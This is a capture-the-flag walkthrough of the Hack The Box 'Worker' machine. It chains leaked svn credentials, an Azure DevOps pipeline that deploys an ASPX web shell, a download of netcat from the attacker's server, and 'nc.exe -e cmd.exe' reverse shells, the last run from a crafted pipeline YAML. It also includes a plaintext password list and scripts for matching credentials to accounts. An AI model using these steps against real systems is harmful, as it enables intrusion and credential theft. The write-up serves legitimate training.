Worker HTB

IP

10.10.10.203

initial nmap scan

sudo nmap -p- --min-rate 10000 10.10.10.203 | grep '^[0-9]' | cut -d'/' -f1 | tr '\n' ','

we have the following ports open on the target machine

80,3690,5985

Let's run a more in-depth scan of these ports

sudo nmap -sCV -p80,3690,5985 -oA tcp_ports 10.10.10.203

results

PORT     STATE SERVICE  VERSION
80/tcp   open  http     Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
3690/tcp open  svnserve Subversion
5985/tcp open  http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

what we can see

  • HTTP web server: IIS 10.0

  • Port 3690: Subversion, what is it?

    • svnserve is Subversion's lightweight standalone server; it speaks a custom, stateful protocol to clients over TCP/IP and acts as a centralised version control system. Subversion is licensed under the Apache License

  • we are dealing with a Windows server (5985 is WinRM, which will matter once we have credentials)

Let's check out the web server

when we access the web server we can see the default IIS server landing page

for good measure we will run feroxbuster and see if we can find any hidden web pages

feroxbuster -u http://10.10.10.203 -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x asp,aspx -o dirs_http.txt

Let's check out this svnserve server

to enumerate svnserve we can use the svn client, which comes with Kali

  1. Let's list any contents that may be in the repo

svn ls svn://10.10.10.203

we do find something interesting

svn ls svn://10.10.10.203 
dimension.worker.htb/
moved.txt

Looks like we found a possible subdomain and a .txt file

  2. Let's download the repo's contents

svn checkout svn://10.10.10.203

the checkout gives us moved.txt plus a .svn directory holding the working copy metadata

reading moved.txt

it points us to another subdomain, devops.worker.htb, so we add both dimension.worker.htb and devops.worker.htb to our hosts file

Let's check out these new subdomains

dimension.worker.htb

  • not a lot to work with here

for good measure let's run feroxbuster and see if we can find anything

feroxbuster -u http://dimension.worker.htb -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x asp,aspx -o dirs_dimension.txt

devops.worker.htb

we are asked for a username and password

while checking out the source code we picked up from the subversion server, we didn't find much in the code itself, but we do have a .svn directory

inside the .svn directory we find wc.db, the SQLite database that Subversion clients (1.7 and later, the "WC-NG" working copy format) use to store the working copy's metadata: which files are checked out, their revisions, and the checksums of their pristine copies

we should be able to open the file with sqlitebrowser

sqlitebrowser wc.db

within the PRISTINE table we can find multiple SHA1 checksums

Let's copy all these checksums to a file; we can also query the database directly with the sqlite3 cli

sqlite3 .svn/wc.db

we can query the database

SELECT * FROM PRISTINE;

and we have both the SHA1 and MD5 checksums

Once we have saved all the hashes to a file let's clean them up before we start running them through hashcat

grep -oP '\$md5 \$\K[0-9a-f]{32}' hashes > md5_hashes.txt
grep -oP '\$sha1\$\K[0-9a-f]{40}' hashes > sha1_hashes.txt

Now we have our hashes all cleaned up let's run them through hashcat

  • we were unable to crack the hashes, back to the drawing board. In hindsight this was never going to work: the PRISTINE table stores SHA1/MD5 checksums of file contents, not password hashes, and the files they belong to are already on disk under .svn/pristine/
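To make the point concrete, here is an added example (not code from the original notes) showing what the PRISTINE checksums actually refer to: a "$sha1$<hex>" value names the pristine copy of a file, which the svn client stores at .svn/pristine/<first two hex chars>/<hex>.svn-base. The helpers map a checksum to that file and verify it; make_demo_wc builds a constructed working copy (one made-up file body) so the script runs offline, and it assumes sha1sum and mktemp are available.

```shell
#!/bin/sh
# Added example, not code from the original notes. A "$sha1$<hex>" value in the
# PRISTINE table names the pristine copy of a file, stored by the SVN client at
# .svn/pristine/<first two hex chars>/<hex>.svn-base. These helpers map a checksum
# to that file and verify it; make_demo_wc builds a constructed working copy so the
# script runs offline (needs sha1sum and mktemp).

# Map a wc.db checksum string to the pristine file it refers to.
pristine_path() {
  wc="$1"
  hex=${2#'$sha1$'}
  printf '%s/.svn/pristine/%s/%s.svn-base\n' "$wc" "$(printf '%s' "$hex" | cut -c1-2)" "$hex"
}

# Return 0 if the pristine file exists and its content really hashes to the checksum.
verify_pristine() {
  path="$(pristine_path "$1" "$2")"
  [ -f "$path" ] || return 1
  expected=${2#'$sha1$'}
  actual="$(sha1sum "$path" | cut -d' ' -f1)"
  [ "$actual" = "$expected" ]
}

# Constructed working copy with one pristine file, laid out the way svn does it.
# Prints "<wc dir> <checksum>" so callers can use both.
make_demo_wc() {
  wc="$(mktemp -d)"
  content='server = build01; user = deploy'   # constructed file body, not a real repo file
  hex="$(printf '%s\n' "$content" | sha1sum | cut -d' ' -f1)"
  dir="$wc/.svn/pristine/$(printf '%s' "$hex" | cut -c1-2)"
  mkdir -p "$dir"
  printf '%s\n' "$content" > "$dir/$hex.svn-base"
  printf '%s $sha1$%s\n' "$wc" "$hex"
}

demo() {
  set -- $(make_demo_wc)
  if verify_pristine "$1" "$2"; then
    echo "checksum $2 -> $(pristine_path "$1" "$2")"
    cat "$(pristine_path "$1" "$2")"   # read the content directly, no cracking needed
  fi
  rm -rf "$1"
}

demo
```

On a real checkout, `ls .svn/pristine/*/` lists every historical file version the client kept, including content from older revisions that is no longer in the working tree.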

back to enumerating svn

we can check the subversion log

svn log svn://10.10.10.203

we can see the following

Looking at r2 we can see the user nathen added a deployment script. Let's check it out by updating the working copy to that revision

svn up -r2

we do find a set of credentials

nathen: wendel98

but to be safe let's check out the other commits too

svn up -r3

we find an updated deploy.ps1 script

  • the credentials have been removed from the script in this revision, so r2 is the one that leaked them

svn up -r4
  • nothing new

svn up -r5
  • nothing new
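Stepping through r2 to r5 by hand works for five revisions but not for five hundred. The following added example (not code from the original notes) walks the history with `svn log -q` and `svn diff -c <rev>` and flags added or removed lines whose key looks like a credential, so a secret that was added in one revision and stripped in the next still shows up. scan_diff works on any unified diff read from stdin and runs offline against the constructed sample below (which is not the real deploy.ps1, only the nathen/wendel98 values come from the notes); scan_history needs the svn client and assumes the repo URL svn://10.10.10.203.

```shell
#!/bin/sh
# Added example, not code from the original notes. Rather than checking out r2..r5
# by hand, walk the history with "svn log -q" and "svn diff -c <rev>" and flag
# added or removed lines that look like credentials. scan_diff works on any unified
# diff from stdin, so it also runs offline on the constructed sample below;
# scan_history needs the svn client and the repo URL (assumed: svn://10.10.10.203).

# Print "<+|-><file>:<line>" for each changed line whose key looks like a secret.
scan_diff() {
  awk '
    substr($0, 1, 4) == "+++ " { file = $2; next }
    substr($0, 1, 4) == "--- " { next }
    substr($0, 1, 1) == "+" || substr($0, 1, 1) == "-" {
      line = substr($0, 2)
      if (line ~ /[Pp]ass(word|wd)?[ \t]*[=:]/ || line ~ /[Ss]ecret[ \t]*[=:]/ || line ~ /[Tt]oken[ \t]*[=:]/)
        print substr($0, 1, 1) file ":" line
    }'
}

# Walk every revision of a live repository (not run here: needs network + svn).
scan_history() {
  url="$1"
  for r in $(svn log -q "$url" | sed -n 's/^r\([0-9][0-9]*\) .*/\1/p' | sort -n); do
    svn diff -c "$r" "$url" | scan_diff | sed "s/^/r$r /"
  done
}

# Constructed sample diff (not the real deploy.ps1): a password added in r2, removed in r3.
SAMPLE_DIFF='--- deploy.ps1 (revision 1)
+++ deploy.ps1 (revision 2)
@@ -1,3 +1,4 @@
 # deploy script
+$user = "nathen"
+$password = "wendel98"
 Copy-Item src dest
--- deploy.ps1 (revision 2)
+++ deploy.ps1 (revision 3)
@@ -1,4 +1,3 @@
 # deploy script
 $user = "nathen"
-$password = "wendel98"
 Copy-Item src dest'

sample_findings() {
  printf '%s\n' "$SAMPLE_DIFF" | scan_diff
}

sample_findings
```

Usage against the target would be `scan_history svn://10.10.10.203`; the r3 removal line is exactly the signal that someone noticed the leak, which is a good reason to check whether the password was also rotated.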

Let's see if these creds work for devops.worker.htb

they are indeed valid and we have access to the DevOps subdomain

we can see

  • we are in an Azure DevOps instance

  • we are logged in as the user WORKER\nathen

  • we can see a current project "SmartHotel360"

if we click on the "SmartHotel360" Project then click on repo we can load the SmartHotel360 repo

at the top of the page there is a dropdown that shows other repos that are available in this project

within the menu on the left hand side we can see Pipelines

What are Pipelines in Azure?

  • CI/CD (Continuous Integration and Continuous Deployment) service that automates the build, test and deployment phases of the development process

when we click view (right corner) we can see further details

looking at the YAML file

steps:
- task: CopyFiles@2
  displayName: 'Deploy web site'
  inputs:
    SourceFolder: '$(Build.SourcesDirectory)'
    Contents: |
      **
      !.git/**/*
    TargetFolder: 'w:\sites\$(Build.Repository.Name).worker.htb'
    CleanTargetFolder: true
    OverWrite: true
  timeoutInMinutes: 5

this task copies everything from the checked-out source (except the .git directory) into a per-repository folder under w:\sites\, named after the repo, which is most likely where IIS serves <repo>.worker.htb from

we will keep an eye out for the target folder

if we click on run or Queue we can see the following

Looks like we do have permission to start a build, which means if we can make modifications to the site via the repo here, we can use the pipeline to push the changes made in the repo to the hosted site

Let's see if we can upload a basic webshell to the site

  1. let's try through the alpha repo, we can click upload file

  2. select our webshell

  3. trying to commit our shell straight to master shows an error, we aren't allowed to commit to that branch directly

  4. we do have the ability to create a branch, so we create one (shrek123)

  5. now we should have the ability to upload our webshell to that branch

  6. back in Pipelines, we can select the CI/CD job for the project we uploaded into (Alpha) and run the build job, giving it the branch we created earlier (shrek123)

  7. after 30 seconds or so we can head over to http://alpha.worker.htb/cmdasp.aspx

  • don't forget to add the alpha subdomain to our hosts file

we can run commands on the target server through the web shell

Let's upload nc64.exe to the target server and establish a reverse shell

  1. Let's start a python http server within the same directory as nc64.exe (binding port 80 needs root)

sudo python3 -m http.server 80

  2. Through our web shell let's use wget (the PowerShell alias for Invoke-WebRequest, so the URL needs its http:// scheme) to fetch our file and place it in the \programdata directory

powershell -c wget http://10.10.14.22/nc64.exe -outfile \programdata\nc.exe

  3. Let's start a listener

rlwrap -cAr nc -lvnp 9001

  4. Let's execute nc.exe through the web shell

\programdata\nc.exe -e cmd.exe 10.10.14.22 9001

we have a shell on the target

looking through the \Users directory we can see the users on the system

Since we know the Azure DevOps pipeline deploys to W:, let's see if that drive exists on this host. We can list all the drives on the target with wmic

wmic logicaldisk get deviceid, volumename, description

  • we can most certainly see the W: drive

we can get the same results using powershell too

powershell -c get-psdrive -psprovider filesystem

Let's jump over to W:

w:

Looking through the files we do find something interesting

within W:\svnrepos\www\conf we find the file passwd

more passwd
### This file is an example password file for svnserve.
### Its format is similar to that of svnserve.conf. As shown in the
### example below it contains one section labelled [users].
### The name and password for each user follow, one account per line.

[users]
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
noahip = player
nuahip = wkjdnw
oakhol = bxwdjhcue
owehol = supersecret
paihol = painfulcode
parhol = gitcommit
pathop = iliketomoveit
pauhor = nowayjose
payhos = icanjive
perhou = elvisisalive
peyhou = ineedvacation
phihou = pokemon
quehub = pickme
quihud = kindasecure
rachul = guesswho
raehun = idontknow
ramhun = thisis
ranhut = getting
rebhyd = rediculous
reeinc = iagree
reeing = tosomepoint
reiing = isthisenough
renipr = dummy
rhiire = users
riairv = canyou
ricisa = seewhich
robish = onesare
robisl = wolves11
robive = andwhich
ronkay = onesare
rubkei = the
rupkel = sheeps
ryakel = imtired
sabken = drjones
samken = aqua
sapket = hamburger
sarkil = friday
  • as you can see we have a list of plain text passwords; this is svnserve's own password file (the [users] section maps svn usernames to clear-text passwords), not the unhashed versions of the checksums we found earlier. Note that nathen's entry, wendel98, is the same password we found in r2

we did see a user named robisl in \Users, and there is a matching entry in the passwd file with a password, so let's see if we can winrm into the machine with it
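Spotting robisl by eye works for one user; the added example below (not code from the original notes) does the cross-reference for the whole file: it parses the [users] section of an svnserve passwd file, keeps only the usernames that also appear in a local account listing, and prints user:pass pairs ready for evil-winrm. Both inputs are constructed stand-ins (the passwd lines are a subset of the ones above; the C:\Users listing is made up apart from robisl); on the box you would feed the real passwd file and the output of `dir C:\Users`.

```shell
#!/bin/sh
# Added example, not code from the original notes. Cross-reference the svnserve
# passwd file found under W:\svnrepos\www\conf with the account names seen under
# C:\Users and print user:pass pairs worth trying over WinRM. Both inputs below are
# constructed stand-ins; on the box you would feed the real files.

# Parse the [users] section of an svnserve passwd file ("name = password" lines),
# skipping comments, blank lines and any other section. Output: name<TAB>password.
parse_svn_passwd() {
  awk '
    /^[ \t]*#/ || /^[ \t]*$/ { next }
    /^\[/ { insec = ($0 ~ /^\[users\]/); next }
    insec && index($0, "=") > 0 {
      name = substr($0, 1, index($0, "=") - 1); gsub(/^[ \t]+|[ \t]+$/, "", name)
      pass = substr($0, index($0, "=") + 1);    gsub(/^[ \t]+|[ \t]+$/, "", pass)
      print name "\t" pass
    }'
}

# Keep only entries whose username is also a local account (case-insensitive,
# CRLF-tolerant so a listing copied out of a Windows shell works as-is).
match_local_users() {
  awk -F'\t' -v uf="$1" '
    BEGIN { while ((getline u < uf) > 0) { sub(/\r$/, "", u); local[tolower(u)] = 1 } }
    tolower($1) in local { print $1 ":" $2 }'
}

# Constructed subset of the passwd file from the notes.
SAMPLE_PASSWD='### example svnserve password file
[users]
nathen = wendel98
nichin = fqerfqerf
robisl = wolves11
sarkil = friday'

# Constructed listing of C:\Users on the target (only robisl is from the notes).
SAMPLE_USERS='Administrator
Public
robisl'

# Print every user:pass pair where the svn username is also a local account.
candidates() {
  tmp="$(mktemp)"
  printf '%s\n' "$SAMPLE_USERS" > "$tmp"
  printf '%s\n' "$SAMPLE_PASSWD" | parse_svn_passwd | match_local_users "$tmp"
  rm -f "$tmp"
}

candidates
```

Each output line can be split straight into `evil-winrm -i 10.10.10.203 -u <user> -p '<pass>'`; with 45 entries in the real file, the filter is what keeps the spray short and avoids lockouts.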

evil-winrm -i 10.10.10.203 -u robisl -p 'wolves11' 
  • it works!

  • couldn't find a whole lot in the way of priv esc from the shell itself

Let's see if we can log in to DevOps using robisl's creds

  • we have authentication

  • we can see a different project, PartsUnlimited, which contains a lot of files but none seem too interesting

within the Project Setting -> General -> Security we can see robisl is a build administrator

  • This group has the ability to define builds with CI and other pipeline related tasks.

Let's see if we can create a pipeline

  1. we want to navigate to Pipelines -> New Pipeline

  2. let's select Azure Repos Git, and then select PartsUnlimited from the list

  3. now we want to select what kind of project this will be, select Starter Pipeline

  • we should see a YAML file that defines the pipeline

Let's break down this YAML file

  • trigger: defines when this runs; in this default case the pipeline will run on commits (or merges) to the master branch. Our current user robisl doesn't have permission to commit to master, but saving will also run the pipeline, so the trigger is not important for us

  • pool: defines which agent pool the pipeline runs on, i.e. which build machine executes the steps

  • steps: defines the various scripts that will run, in order. A script can be a single line, or a multiline string using the YAML | indicator, which keeps newlines until the next entry at the same indent level

Lets troubleshoot the template

When we try to save and run, our template can't be pushed to master because the user robisl isn't permitted to commit there

  1. Let's create a new branch named shrek1234 and save to it instead

we do get the following error

why is it failing?

  • because there is no pool named Default and robisl doesn't have the permissions to authorize resources

how can we fix this?

  • we can click on the Azure DevOps logo in the top left corner of the screen, then Collection settings at the bottom left; on the left side there's a menu for Agent pools

  • there is a pool called Setup

  2. Let's go back to Pipelines for PartsUnlimited and start a new pipeline. In the YAML, we set the pool name to Setup, then save and run

  • we will need to delete the branch we created or create a new one (created a new one, shrek12345)

when we save and run we can see the following

  1. we can see in the summary everything worked just fine

Gaining a shell on the system

if we look back at the YAML file, we have the ability to run scripts and programs on the build agent, which is the target server itself. Remember we uploaded nc.exe to \programdata earlier, let's see if we can execute it and gain a shell on the system

  1. start a nc listener

rlwrap -cAr nc -lvnp 9001

  2. same process as before, but this time we edit the script field in the YAML: keep pool set to Setup and replace the starter script with the nc command from earlier, \programdata\nc.exe -e cmd.exe 10.10.14.22 9001

  3. let's save and run

  4. if we look at our listener we can see the following
